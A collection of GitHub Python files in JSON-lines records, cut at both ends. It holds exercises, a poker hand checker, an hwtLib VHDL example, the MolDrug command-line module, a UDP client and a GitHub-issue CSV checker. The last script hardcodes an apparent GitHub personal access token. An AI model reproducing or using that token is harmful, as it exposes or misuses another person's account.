50)\nresultadolista = crearlista(elementos)\nprint(\"lista original: \", resultadolista, len(resultadolista))\nrep = repeticionvalorlista(resultadolista)\n\nif rep:\n unicos = borrarrepetidos(resultadolista)\n print(\"hay elementos repetidos\",end=\",\")\n if len(unicos) > 0:\n print(\"los elementos unicos en la lista son: \", unicos)\n else:\n print(\"no habia elementos unicos en la lista\")\nelse:\n print(\"no hay elementos repetidos\")\n print(\"lista original: \", resultadolista)\n","repo_name":"Danisdnk/PythonExerciseGuide","sub_path":"TP2/2.2.py","file_name":"2.2.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38173048721","text":"'''\r\nThis code checks if there is any winning category. A check is made against each winning category starting from Highest ranking\r\ncategory. If a winning category is found the winning combination is returned or else a 'False' is returned.\r\n'''\r\nfrom cards import Deck\r\nfrom cards import Card\r\nfrom functools import reduce\r\nfrom collections import Counter\r\n\r\ndef is_consecutive(list, count): \r\n ''' Function checks if there is a certain number of consecutive cards'''\r\n consecutive_count = 0\r\n for i in range(len(list) - 1):\r\n if list[i] + 1 == list[i+1]:\r\n consecutive_count += 1\r\n if consecutive_count == count-1:\r\n return True\r\n else:\r\n consecutive_count = 0\r\n return False\r\n\r\ndef find_consecutive_values(list, count): \r\n ''' Function finds consecutive cards if any and returns it'''\r\n for i in range(len(list) - count + 1):\r\n if all(list[i+j] == list[i+j+1] - 1 for j in range(count - 1)):\r\n return list[i:i+count]\r\n return []\r\n\r\ndef repeating_items(list, count): \r\n ''' Function checks if there are pairs and checks for the number of pairs found'''\r\n repeating=[]\r\n dictionary = {}\r\n \r\n for item in list:\r\n if item not in dictionary:\r\n dictionary[item] = 1\r\n else:\r\n dictionary[item] += 1\r\n \r\n for key, value in dictionary.items():\r\n if value == count:\r\n repeating.append(key)\r\n \r\n return repeating\r\n\r\n\r\n#----------------------------------------------------------------------------------------\r\n\r\ndef one_pair(community,p):\r\n ''' Function checks if one pair category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n winning_combo=[]\r\n p_values=[] #stores ranks of cards \r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n repeating_elements=repeating_items(p_values,2)\r\n\r\n if len(repeating_elements) == 1:\r\n for j in p_com:\r\n if j.get_value()==repeating_elements[0]:\r\n winning_combo.append(i)\r\n else:\r\n return False \r\n \r\n return winning_combo\r\n\r\ndef two_pair(community,p):\r\n ''' Function checks if two pair category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n winning_combo=[]\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n repeating_elements=repeating_items(p_values,2)\r\n\r\n if len(repeating_elements) == 2:\r\n for x in range(2):\r\n for j in p_com:\r\n if j.get_value()==repeating_elements[x-1]:\r\n winning_combo.append(j)\r\n else:\r\n return False \r\n \r\n return winning_combo\r\n\r\ndef three_of_a_kind(community,p):\r\n ''' Function checks if three of a kind category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n winning_combo=[]\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n\r\n repeating_elements = repeating_items(p_values,3)\r\n \r\n if len(repeating_elements)>0:\r\n for j in p_com:\r\n if j.get_value()==repeating_elements[0]:\r\n winning_combo.append(j) \r\n\r\n if len(winning_combo) ==3:\r\n return winning_combo\r\n else:\r\n return False\r\n \r\n\r\ndef straight(community,p):\r\n ''' Function checks if straight category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n p_values=[] #stores ranks of cards \r\n win=[]\r\n winning_combo=[]\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n sorted_p=sorted(list(set((p_values)))) #removes duplicate values and then sorts\r\n result=is_consecutive(sorted_p,5) #checks if has 5 consecutive values\r\n if result == True:\r\n combo=find_consecutive_values(sorted_p,5)\r\n for j in combo:\r\n win.append(p_values.index(j)) \r\n\r\n for h in win:\r\n winning_combo.append(p_com[h]) \r\n \r\n if len(winning_combo)>0:\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef flush(community,p):\r\n ''' Function checks if flush category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n \r\n for i in p_com:\r\n p_values.append((i.get_suit()))\r\n repeat_suit=repeating_items(p_values,5)\r\n \r\n if len(repeat_suit)>0:\r\n winning_combo=[]\r\n for j in p_com:\r\n if j.get_suit()==repeat_suit[0]:\r\n winning_combo.append(j)\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef full_house(community,p):\r\n ''' Function checks if full house category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n is_three_of_kind=three_of_a_kind(community,p)\r\n is_one_pair=one_pair(community,p) \r\n if is_three_of_kind and is_one_pair:\r\n winning_combo=reduce(lambda x, y: x + y, [is_three_of_kind,is_one_pair])\r\n return winning_combo\r\n else:\r\n return False\r\n\r\ndef four_of_a_kind(community,p):\r\n ''' Function checks if four of a kind category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n winning_combo=[]\r\n p_values=[] #stores ranks of cards\r\n p_com= reduce(lambda x, y: x + y, [community,p])\r\n for i in p_com:\r\n p_values.append((i.get_value()))\r\n\r\n repeating_elements = repeating_items(p_values,4)\r\n \r\n if len(repeating_elements)>0:\r\n for j in p_com:\r\n if j.get_value()==repeating_elements[0]:\r\n winning_combo.append(j) \r\n\r\n if len(winning_combo) ==4:\r\n return winning_combo\r\n else:\r\n return False\r\n \r\ndef straight_flush(community,p):\r\n ''' Function checks if straight flush category is being fulfilled. If yes the winning combination is returned\r\n else a 'False' is returned. '''\r\n straight_combo=[]\r\n winning_combo=[]\r\n is_straight=straight(community,p)\r\n is_flush=flush(community,p)\r\n if is_straight and is_flush:\r\n straight_combo=straight(is_flush,p)\r\n winning_combo=straight_combo\r\n if len(winning_combo)>0:\r\n return winning_combo\r\n else:\r\n return False\r\n \r\n# --------------------------------------------------------------------------------------------------------\r\ndef check(community,p):\r\n ''' Function checks if any one of the categories is being filled. Order of checking starts with highest ranking and\r\n search terminates as soon as first category is fulfilled. '''\r\n if straight_flush(community,p):\r\n return (\"Straight Flush\",straight_flush(community,p))\r\n elif four_of_a_kind(community,p):\r\n return (\"Four of a Kind\",four_of_a_kind(community,p))\r\n elif full_house(community,p):\r\n return (\"Full house\",full_house(community,p))\r\n elif flush(community,p):\r\n return (\"Flush\",flush(community,p))\r\n elif straight(community,p):\r\n return (\"Straight\",straight(community,p))\r\n elif three_of_a_kind(community,p):\r\n return (\"Three of a kind\",three_of_a_kind(community,p))\r\n elif two_pair(community,p):\r\n return (\"Two Pair\",two_pair(community,p))\r\n elif one_pair(community,p):\r\n return(\"One Pair\",one_pair(community,p))\r\n else:\r\n return (\"Nothing\", False)\r\n\r\n'''\r\nTesting the code:\r\nTesting phase 1: creating cards\r\n----\r\nc1=Card()\r\nc2=Card()\r\nc3=Card()\r\nc4=Card()\r\nc5=Card()\r\nc6=Card()\r\nc7=Card()\r\nc8=Card()\r\nc9=Card()\r\nc1.set_rank(8)\r\nc1.set_suit(1)\r\n\r\nc2.set_rank(8)\r\nc2.set_suit(2)\r\n\r\nc3.set_rank(8)\r\nc3.set_suit(4)\r\n\r\nc4.set_rank(9)\r\nc4.set_suit(4)\r\n\r\nc5.set_rank(12)\r\nc5.set_suit(4)\r\n\r\nc6.set_rank(11)\r\nc6.set_suit(4)\r\n\r\nc7.set_rank(10)\r\nc7.set_suit(4)\r\n-----\r\n\r\nTesting phase 2: Manually assigning cards to check if category checks function as intended\r\n\r\n\r\ncommunity=[c1,c2,c3,c4,c5]\r\np1=[c6,c7]\r\n'''\r\n\r\n\r\n\r\n\r\n","repo_name":"ghc4716/Poker-CLI-Game","sub_path":"categorycheck.py","file_name":"categorycheck.py","file_ext":"py","file_size_in_byte":8375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40284308754","text":"import sys\ninput = lambda : sys.stdin.readline()\ncase = 0\n\nwhile True:\n R, N = list(map(int, input().split()))\n if R == 0 or N == 0:\n break\n case += 1\n\n res, rem = divmod(R-N, N)\n res += 1 if rem else 0\n if 0 <= res <= 26:\n print(\"Case %d: %d\" %(case,res))\n else:\n print(\"Case %d: impossible\" %(case))\n\n","repo_name":"ZenithZyf/Codes","sub_path":"UVa/11723-NumberingRoads.py","file_name":"11723-NumberingRoads.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25871689421","text":"S = input()\n\nduck = {'q':0,'u':1,'a':2,'c':3,'k':4}\n\nqueue = []\nanswer = 0\nfor sound in S:\n flag = True\n for ind in range(len(queue)):\n if (queue[ind] + 1)%5 == duck[sound]:\n queue[ind] = (queue[ind] + 1)%5\n flag = False\n break\n if flag:\n if duck[sound] != 0:\n answer = -1\n break\n queue.append(0)\n\n\nif answer == -1:\n print(-1)\nelse:\n for num in queue:\n if num != 4:\n print(-1)\n break\n else:\n print(len(queue))\n","repo_name":"gkgg123/TIL_new","sub_path":"알고리즘/백준/12933_오리_version2.py","file_name":"12933_오리_version2.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17409414785","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom hwt.hdl.types.bits import Bits\nfrom hwt.interfaces.std import Signal\nfrom hwt.synthesizer.unit import Unit\nfrom hwtLib.examples.base_serialization_TC import BaseSerializationTC\n\n\nclass VhdlVectorAutoCastExample(Unit):\n\n def _declr(self):\n std_logic = Bits(1)\n std_logic_vector_0 = Bits(1, force_vector=True)\n\n self.a = Signal(dtype=std_logic)\n self.b = Signal(dtype=std_logic)._m()\n\n self.c = Signal(dtype=std_logic_vector_0)._m()\n\n self.d = Signal(dtype=std_logic_vector_0)\n self.e = Signal(dtype=std_logic)._m()\n\n self.f = Signal(dtype=std_logic)\n self.g = Signal(dtype=std_logic_vector_0)\n\n self.i = Signal(dtype=std_logic)._m()\n\n self.j = Signal(dtype=std_logic)._m()\n\n def _impl(self):\n # no conversion\n self.b(self.a)\n\n # std_logic -> std_logic_vector\n self.c(self.a)\n # std_logic_vector -> std_logic\n self.e(self.d)\n\n # unsigned(std_logic) + unsigned(std_logic_vector) -> std_logic_vector -> std_logic\n self.i(self.f + self.g)\n\n # unsigned(std_logic) + unsigned(std_logic_vector) -> std_logic_vector -> std_logic\n self.j(self.g + self.f)\n\n\nclass VhdlVectorAutoCastExampleTC(BaseSerializationTC):\n __FILE__ = __file__\n\n def test_vhdl(self):\n u = VhdlVectorAutoCastExample()\n self.assert_serializes_as_file(u, \"VhdlVectorAutoCastExample.vhd\")\n\n\nif __name__ == '__main__':\n from hwt.synthesizer.utils import to_rtl_str\n from hwt.serializer.vhdl import Vhdl2008Serializer\n\n u = VhdlVectorAutoCastExample()\n print(to_rtl_str(u, Vhdl2008Serializer))\n\n import unittest\n testLoader = unittest.TestLoader()\n # suite = unittest.TestSuite([VhdlVectorAutoCastExampleTC(\"test_vhdl\")])\n suite = testLoader.loadTestsFromTestCase(VhdlVectorAutoCastExampleTC)\n runner = unittest.TextTestRunner(verbosity=3)\n runner.run(suite)\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/examples/arithmetic/vhdl_vector_auto_casts.py","file_name":"vhdl_vector_auto_casts.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"7426623186","text":"import os\nimport random\n\ntopfolder = 'images/'\ninfotext = 'annotations/list.txt'\n\nfile1 = open(infotext, 'r')\nLines = file1.readlines()\n\n\nfor idx,l in enumerate(Lines):\n s = l.split()\n if s[2] == str(2):\n species = 'dog/'\n else:\n species = 'cat/'\n r = random.random()\n if r > 0.9:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/test/' + species + s[0] + '.jpg')\n elif r > 0.85:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/val/' + species + s[0] + '.jpg')\n else:\n os.rename(topfolder + s[0] + '.jpg', 'sortedimages/train/' + species + s[0] + '.jpg')\n","repo_name":"HannahKuehn/DeepLearningProject","sub_path":"imagesortertotalbinary.py","file_name":"imagesortertotalbinary.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19156760776","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFor information of MolDrug:\n Docs: https://moldrug.readthedocs.io/en/latest/\n Source Code: https://github.com/ale94mleon/moldrug\n\"\"\"\nfrom moldrug import utils, constraintconf, __version__\nimport yaml, argparse, inspect, os, sys, datetime\nfrom rdkit import Chem\n\nclass CommandLineHelper:\n def __init__(self, parser) -> None:\n self.args = parser.parse_args()\n self.yaml_file = self.args.yaml_file\n self.fitness = self.args.fitness\n self.outdir = self.args.outdir\n self.continuation = self.args.continuation\n self._set_attributes()\n\n def _set_attributes(self):\n # Get and set configuration\n self._set_config()\n # It will generate costfunc attribute\n self._set_costfunc()\n # it will generate the attribute TypeOfRun\n self._set_TypeOfRun()\n # it will generate the attributes: MainConfig, FollowConfig, InitArgs, CallArgs and MutableArgs\n self._translate_config()\n # Here FollowConfig is updated and the corresponded initialization occurs if self.continuation.\n # pbz2 and new_maxiter attributes are generated\n self._set_init_MolDrugClass()\n\n\n def _set_config(self):\n with open(self.yaml_file, 'r') as c:\n self.configuration = yaml.safe_load(c)\n\n def _split_config(self):\n config = self.configuration.copy()\n MainConfig = config.pop(list(config.keys())[0])\n FollowConfig = config\n return MainConfig, FollowConfig\n\n def _set_costfunc(self):\n if self.fitness:\n # If the fitness module provided is not in the current directory or if its name is not fitness\n # Create the module inside MolDrug\n if self.outdir:\n if not os.path.exists(self.outdir): os.makedirs(self.outdir)\n destination_path = os.path.join(self.outdir, 'CustomMolDrugFitness.py')\n else:\n destination_path = 'CustomMolDrugFitness.py'\n with open(self.fitness, 'r') as source:\n with open(destination_path, 'w') as destination:\n destination.write(source.read())\n # Changing to the outdir path if provided\n if self.outdir: os.chdir(self.outdir)\n sys.path.append('.')\n import CustomMolDrugFitness\n\n costfunc = dict(inspect.getmembers(CustomMolDrugFitness))[self._split_config()[0]['costfunc']]\n else:\n from moldrug import fitness\n costfunc = dict(inspect.getmembers(fitness))[self._split_config()[0]['costfunc']]\n self.costfunc = costfunc\n\n def _set_TypeOfRun(self):\n self._TypeOfRun_str = self._split_config()[0]['type'].lower()\n if self._TypeOfRun_str == 'ga':\n self.TypeOfRun = utils.GA\n elif self._TypeOfRun_str == 'local':\n self.TypeOfRun = utils.Local\n else:\n raise NotImplementedError(f\"\\\"{self._split_config()[0]['type']}\\\" it is not a possible type. Select from: GA or Local\")\n\n def _translate_config(self):\n MainConfig, FollowConfig = self._split_config()\n\n # Convert the SMILES (or path to compress_pickle) to RDKit mol (or list of RDkit mol)\n if self._TypeOfRun_str == 'local':\n MainConfig['seed_mol'] = Chem.MolFromSmiles(MainConfig['seed_mol'])\n else:\n # TODO make clear errors in case the path does not exist or it was not possible to create a molecule\n if isinstance(MainConfig['seed_mol'], list):\n # If the items are path to the pickle objects\n if any([os.path.isfile(path) for path in MainConfig['seed_mol']]):\n seed_pop = set()\n for solution in MainConfig['seed_mol']:\n _, pop = utils.decompress_pickle(solution)\n seed_pop.update(pop)\n # Sort\n seed_pop = sorted(seed_pop)\n # Select the best and get only the RDKit molecule object\n MainConfig['seed_mol'] = [individual.mol for individual in seed_pop[:MainConfig['popsize']]]\n else:\n # Delete repeated SMILES\n MainConfig['seed_mol'] = set(MainConfig['seed_mol'])\n # COnvert to mol\n MainConfig['seed_mol'] = [Chem.MolFromSmiles(smi) for smi in MainConfig['seed_mol']]\n # Filter out invalid molecules\n MainConfig['seed_mol'] = list(filter(None, MainConfig['seed_mol']))\n else: # It will be assumed that it is a valid SMILES string\n MainConfig['seed_mol'] = Chem.MolFromSmiles(MainConfig['seed_mol'])\n\n # Convert if needed constraint_ref\n if 'constraint_ref' in MainConfig['costfunc_kwargs']:\n MainConfig['costfunc_kwargs']['constraint_ref'] = Chem.MolFromMolFile(MainConfig['costfunc_kwargs']['constraint_ref'])\n\n InitArgs = MainConfig.copy()\n\n # Modifying InitArgs\n _ = [InitArgs.pop(key, None) for key in ['type', 'njobs', 'pick']]\n InitArgs['costfunc'] = self.costfunc\n\n # Getting call arguments\n CallArgs = dict()\n for key in ['njobs', 'pick']:\n try:\n CallArgs[key] = MainConfig[key]\n except KeyError:\n pass\n\n # Checking for follow jobs and sanity check on the arguments\n if FollowConfig:\n # Defining the possible mutable arguments with its default values depending on the type of run\n if MainConfig['type'].lower() == 'local':\n raise ValueError(\"Type = Local does not accept multiple call from the command line! Remove follow \"\\\n \"jobs from the yaml file (only the main job is possible)\")\n else:\n # Add default value in case it is not provided for keyword arguments\n ga_keywords = {}\n list_of_keywords = [\n 'beta', 'pc', 'get_similar','mutate_crem_kwargs',\n 'save_pop_every_gen', 'checkpoint', 'deffnm',\n ]\n for param in inspect.signature(self.TypeOfRun).parameters.values():\n if (param.kind == param.POSITIONAL_OR_KEYWORD and\n param.default is not param.empty and\n param.name in list_of_keywords and\n param.name not in InitArgs):\n InitArgs[param.name] = param.default\n\n MutableArgs = {\n 'njobs': CallArgs['njobs'],\n 'crem_db_path': InitArgs['crem_db_path'],\n 'maxiter': InitArgs['maxiter'],\n 'popsize': InitArgs['popsize'],\n 'beta': InitArgs['beta'],\n 'pc': InitArgs['pc'],\n 'get_similar': InitArgs['get_similar'],\n # This one it will update with the default values of crem rather thant the previous one.\n 'mutate_crem_kwargs': InitArgs['mutate_crem_kwargs'],\n 'save_pop_every_gen': InitArgs['save_pop_every_gen'],\n 'checkpoint': InitArgs['checkpoint'],\n 'deffnm': InitArgs['deffnm'],\n }\n\n # Sanity check\n for job in FollowConfig:\n for arg in FollowConfig[job]:\n if arg not in MutableArgs:\n raise ValueError(f\"The job: {job} has a non-valid argument \\\"{arg}\\\". \"\\\n f\"For now only the following are accepted: {list(MutableArgs.keys())}\")\n else:\n MutableArgs = None\n\n self.MainConfig = MainConfig\n self.FollowConfig = FollowConfig\n self.InitArgs = InitArgs\n self.CallArgs = CallArgs\n self.MutableArgs = MutableArgs\n\n def _get_continuation_point(self): # this gave me the job and how many generation are needed to complete it.. The further jobs are suppose that must run.\n if self.continuation:\n if self._TypeOfRun_str != 'ga':\n raise RuntimeError('Continuation is only valid for GA runs.')\n # Check what was already done\n total_iter = 0\n pbz2 = None\n for job in self.configuration:\n # El problema es que no estan los archivos entonces hay que modificar total_iter\n if os.path.isfile(f\"{self.configuration[job]['deffnm']}_result.pbz2\"):\n # must be defined maxiter in the configuration file\n total_iter += self.configuration[job]['maxiter']\n # Delete (update) the jobs in self.FollowConfig if they were already done\n if job in self.FollowConfig:\n del self.FollowConfig[job]\n # Stay with the last one\n pbz2 = f\"{self.configuration[job]['deffnm']}_result.pbz2\"\n\n # If there is a continuation file, use this\n if os.path.isfile(\"cpt.pbz2\"):\n pbz2 = 'cpt.pbz2'\n iter_done = utils.decompress_pickle(pbz2).NumGens\n total_iter = 0\n for job in self.configuration:\n total_iter += self.configuration[job]['maxiter']\n if total_iter >= iter_done:\n del self.FollowConfig[job]\n break\n elif pbz2:\n iter_done = utils.decompress_pickle(pbz2).NumGens\n else:\n iter_done = 0\n new_maxiter = total_iter - iter_done\n else:\n # In this case we must start from scratch. There are not .pbz2 files in the directory\n pbz2, new_maxiter = None, 0\n\n # Set the attributes\n self.pbz2 = pbz2\n self.new_maxiter = new_maxiter\n\n def _set_init_MolDrugClass(self):\n # Here is where the continuation code is added\n\n # Get if if needed to continue and make the corresponded updates on self.FollowConfig\n self._get_continuation_point()\n\n if self.pbz2:\n self.MolDrugClass = utils.decompress_pickle(self.pbz2)\n self.MolDrugClass.maxiter = self.new_maxiter\n else:\n # Initialize the class from scratch\n self.MolDrugClass = self.TypeOfRun(**self.InitArgs)\n\n def run_MolDrugClass(self):\n self.MolDrugClass(**self.CallArgs)\n\n def save_data(self):\n # Saving data\n if self._TypeOfRun_str == 'local':\n self.MolDrugClass.pickle(\"local_result\", compress=True)\n utils.make_sdf(self.MolDrugClass.pop, sdf_name = \"local_pop\")\n else:\n self.MolDrugClass.pickle(f\"{self.MolDrugClass.deffnm}_result\", compress=True)\n utils.make_sdf(self.MolDrugClass.pop, sdf_name = f\"{self.MolDrugClass.deffnm}_pop\")\n\n def __repr__(self) -> str:\n string = self.args.__repr__().replace('Namespace', self.__class__.__name__)\n if self.continuation:\n string += f\"\\nContinuationPoint(pbz2={self.pbz2}, do_iter={self.new_maxiter})\"\n return string\n\ndef __moldrug_cmd():\n \"\"\"\n This function is only used in as part of the command line interface of MolDrug.\n It makes possible to use MolDrug form the command line. More detail help is available\n from the command line `moldrug -h`.\n\n Raises\n ------\n NotImplementedError\n In case that the type of the calculation differs from Local or GA (currently implementations)\n ValueError\n In case that the user ask for followed jobs and Local is selected.\n ValueError\n In case that a non-mutable or non-defined argument is given by the user on the follow jobs.\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__,\n formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n help='The configuration yaml file',\n dest='yaml_file',\n type=str)\n parser.add_argument('-f', '--fitness',\n help=\"The path to the user-custom fitness module; inside of which the given custom cost function must be implemented. \"\\\n \"See the docs for how to do it properly. E.g. my/awesome/fitness_module.py.\"\\\n \"By default will look in the moldrug.fitness module.\",\n dest='fitness',\n nargs=argparse.OPTIONAL,\n default=None,\n type=str)\n parser.add_argument('-o', '--outdir',\n help=\"The path to where all the files should be written. \"\\\n \"By default the current working directory will be used (where the command line was invoked).\",\n dest='outdir',\n nargs=argparse.OPTIONAL,\n default=None,\n type=str)\n parser.add_argument('-c', '--continue',\n help='To continue the simulation. The MolDrug command must be the same and all the output MolDrug files must be located '\\\n 'in the working directory. This option is only compatible with moldrug.utils.GA; otherwise, a RuntimeError will be'\\\n 'raised.',\n action = \"store_true\",\n dest = 'continuation')\n parser.add_argument(\n '-v', '--version',\n action='version',\n version=f\"moldrug: {__version__}\")\n\n UserArgs = CommandLineHelper(parser)\n\n print(\n f\"Started at {datetime.datetime.now().strftime('%c')}\\n\"\n f\"You are using moldrug: {__version__}.\\n\\n\"\\\n f\"{UserArgs}\\n\\n\"\\\n # \"The main job is being executed.\\n\\n\"\\\n )\n\n # Call the class\n UserArgs.run_MolDrugClass()\n # Saving data\n UserArgs.save_data()\n # print('The main job finished!')\n\n # In case that follows jobs were defined\n if UserArgs.FollowConfig:\n MutableArgs = UserArgs.MutableArgs.copy()\n for job in UserArgs.FollowConfig:\n print(f\"The follow job {job} started.\")\n\n # Updating arguments\n MutableArgs.update(UserArgs.FollowConfig[job])\n InitArgs = MutableArgs.copy()\n\n # Changing the attributes values\n for arg in InitArgs:\n setattr(UserArgs.MolDrugClass, arg, InitArgs[arg])\n\n # Call the class again\n UserArgs.run_MolDrugClass()\n # Saving data\n UserArgs.save_data()\n print(f'The job {job} finished!')\n\n # Clean checkpoint on normal end\n try:\n os.remove('cpt.pbz2')\n except Exception:\n pass\n\ndef __constraintconf_cmd():\n \"\"\"\n Command line implementation for :meth:`moldrug.constraintconf.constraintconf`\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\n '--pdb',\n help = 'Protein pdb file',\n dest = 'pdb',\n type = str,\n )\n parser.add_argument(\n '--smi',\n help='Input SMILES file name',\n dest = 'smi',\n type = str,\n )\n parser.add_argument(\n '--fix',\n help = 'File with fixed piece of the molecule',\n dest = 'fix',\n type = str,\n )\n parser.add_argument(\n '--out',\n help = 'Output file name',\n dest = 'out',\n type = str,\n )\n parser.add_argument(\n '--max',\n help = 'Maximum number of conformers to generate, by default %(default)s',\n dest = 'max',\n default = 25,\n type = int,\n )\n parser.add_argument(\n '--rms',\n help = 'RMS cutoff, by default %(default)s',\n dest = 'rms',\n default = 0.01,\n type = float,\n )\n parser.add_argument(\n '--bump',\n help = 'Bump cutoff, by default %(default)s',\n dest = 'bump',\n default = 1.5,\n type = float,\n )\n args = parser.parse_args()\n constraintconf.constraintconf(args.pdb, args.smi, args.fix, args.out, args.max, args.rms, args.bump)\n\n\nif __name__ == '__main__':\n pass","repo_name":"ale94mleon/MolDrug","sub_path":"src/moldrug/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":16279,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"74065003025","text":"# --------------------------------------------------------------------------- #\n# ---------------------- Engenharia de Sistemas - UFMG ---------------------- #\n# ----------------------- DCC023 - Redes de Computadores -------------------- #\n# --------------------- Prof. Ítalo Fernando Scota Cunha -------------------- #\n# ---------------- Trabalho Prático III - Servidor de Mensagens ------------- #\n# ----------- Alunos : Humberto Monteiro Fialho (2013430811) ------------ #\n# -------------------- Rafael Carneiro de Castro (2013030210) ------------ #\n# --------------------------------------------------------------------------- #\n\nimport sys\nimport select\nimport socket as sck\n\n\n# main: calling functions to receive inputs\ndef main():\n if len(sys.argv) > 3:\n local_port = int(sys.argv[1])\n server_ip = sys.argv[2]\n server_port = int(sys.argv[3])\n\n socket = sck.socket(sck.AF_INET, sck.SOCK_DGRAM)\n socket.setsockopt(sck.SOL_SOCKET, sck.SO_REUSEADDR, 1)\n socket.bind(('127.0.0.1', local_port))\n\n while True:\n # select incoming from terminal and socket\n reads, _, _ = select.select([sys.stdin, socket], [], [])\n for read in reads:\n if read == socket:\n # message from server\n data = read.recv(500)\n if data:\n # print the message received\n print(data.decode())\n\n else:\n # message from terminal, send command to server\n message = sys.stdin.readline()\n socket.sendto(message.encode(), (server_ip, server_port))\n\n return\n\n\n# --------------------------------------------------------------------------- #\n# calling main function\nif __name__ == '__main__':\n main()\n","repo_name":"castro150/computers-network","sub_path":"tp3/cliente.py","file_name":"cliente.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39252206865","text":"import requests\r\nimport os\r\nfrom pprint import pprint\r\nimport re\r\nfrom io import StringIO\r\nimport pandas as pd\r\nimport csv\r\nimport numpy as np\r\nfrom collections import Counter\r\n\r\ndef normalize_doi(x):\r\n \"\"\"\r\n Normalizes the DOIs to a URL.\r\n \"\"\"\r\n x = x.strip()\r\n if not x.startswith('http'):\r\n x = f'https://doi.org/{x}'\r\n\r\n return x\r\n\r\n# personal token, change it\r\ntoken = \"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\"\r\n# print(token)\r\n\r\n# file regression\r\nFILE_REGEX = '\\[.*\\]\\((https:\\/\\/github.com\\/bhermann\\/DoR\\/files\\/.*)\\)'\r\n\r\nwith open(\"final_result.csv\", 'w', newline='') as f:\r\n writer = csv.writer(f, delimiter=',')\r\n writer.writerow(['issue_id', 'user', 'link', 'time', 'has_error', 'ready_to_inspect', 'comment'])\r\n\r\n issue_list = [250, 251, 252, 253, 254]\r\n\r\n for i in issue_list:\r\n print(\"current in issue\", i)\r\n query_url = f\"https://api.github.com/repos/bhermann/DoR/issues/{i}/comments\"\r\n params = {\r\n \"state\": \"open\",\r\n }\r\n headers = {'Authorization': f'token {token}'}\r\n r = requests.get(query_url, headers=headers, params=params)\r\n\r\n result = r.json()\r\n\r\n for comment in result:\r\n link = re.findall(FILE_REGEX, comment['body'])\r\n\r\n if len(link) > 0:\r\n # initialize error\r\n has_error = 0\r\n\r\n # initialize process permission\r\n can_process = 1\r\n\r\n # initialize comment\r\n feedback = \"\"\r\n\r\n write_row = [i, comment['user']['login']]\r\n file_url = link[0]\r\n write_row.append(file_url)\r\n\r\n # record comment last update time\r\n update_time = comment['updated_at']\r\n write_row.append(update_time)\r\n\r\n # read csv into a pd DataFrame\r\n r_file = requests.get(file_url)\r\n try:\r\n df = pd.read_csv(\r\n StringIO(r_file.content.decode('latin-1'))\r\n )\r\n except pd.errors.ParserError as err:\r\n print('Parse error in issue ', i)\r\n write_row.append(1)\r\n write_row.append(0)\r\n write_row.append(\"Parse error\")\r\n\r\n writer.writerow(write_row)\r\n continue\r\n\r\n # pre-process the columns\r\n df.columns = [x.strip() for x in df.columns]\r\n\r\n # check if github id is filled in every row\r\n try:\r\n if df['gh_id'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty gh_id. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column gh_id. \"\r\n\r\n # check if reusing DOI is filled in every row\r\n try:\r\n if df['paper_doi'].isnull().values.any():\r\n has_error = 1\r\n feedback = feedback + \"Have empty paper_doi. \"\r\n except KeyError:\r\n has_error = 1\r\n can_process = 0\r\n feedback = feedback + \"No column paper_doi. \"\r\n\r\n # check whether a reuse has reused_doi or alt_url\r\n try:\r\n null_reused_doi = df[df['reused_doi'].isnull()].index.tolist()\r\n null_alt_url = df[df['alt_url'].isnull()].index.tolist()\r\n\r\n if len(np.intersect1d(null_reused_doi, null_alt_url)) != 0:\r\n has_error = 1\r\n feedback = feedback + \"Have reuse with empty reused_doi and alt_url. \"\r\n except KeyError:\r\n has_error = 